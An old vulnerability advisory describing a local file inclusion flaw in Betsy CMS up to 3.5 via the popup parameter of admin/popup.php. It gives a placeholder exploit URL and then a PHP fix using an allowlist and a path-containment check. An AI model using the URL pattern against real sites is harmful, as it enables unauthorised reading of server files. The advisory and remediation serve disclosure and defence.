
# Title : Betsy CMS versions <= 3.5 Local File Inclusion Vulnerability
# Published : 2009-11-21
# Author : MizoZ


/*

Author          : MizoZ [from MA]
Group           : EvilWay
Email           : mizozx[at]gmail[dot]com

Greetz          : Zuka !!

Good luck DZ :)

*/

The vulnerability is in the file admin/popup.php, in its handling of the GET parameter $_GET['popup'].

Exploit :

[HOST]/[PATH]/admin/popup.php?popup=[FILE, INCLUDED RELATIVE TO admin/]
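
One way to close this class of bug in a handler like admin/popup.php, as an added example that is not Betsy CMS code and not part of the original advisory: the popup value is used only as a key into a fixed allowlist, and the resolved file must sit inside one directory. The function resolve_popup, the popups/ directory and the page names are assumptions.

```php
<?php
declare(strict_types=1);

// Hypothetical names: the popups/ directory and the page keys below are
// assumptions for illustration, not taken from Betsy CMS.
const POPUP_DIR = __DIR__ . '/popups';
const POPUP_PAGES = [
    'help'    => 'help.php',
    'preview' => 'preview.php',
];

/**
 * Map the untrusted popup value to a file path, or return null.
 * The request value is only ever used as an array key, never as a path.
 */
function resolve_popup($value): ?string
{
    // Arrays (popup[]=x) and other non-string input are rejected outright.
    if (!is_string($value) || !array_key_exists($value, POPUP_PAGES)) {
        return null;
    }

    $base = realpath(POPUP_DIR);
    $path = realpath(POPUP_DIR . '/' . POPUP_PAGES[$value]);
    if ($base === false || $path === false) {
        return null; // directory or file missing on disk
    }

    // Containment check: catches a symlink or a bad allowlist entry that
    // resolves outside the popup directory.
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

$target = resolve_popup($_GET['popup'] ?? null);
if ($target === null) {
    http_response_code(404);
    // json_encode keeps control characters out of the log line.
    error_log('popup.php: rejected popup value ' . json_encode($_GET['popup'] ?? null));
    exit;
}
include $target;
```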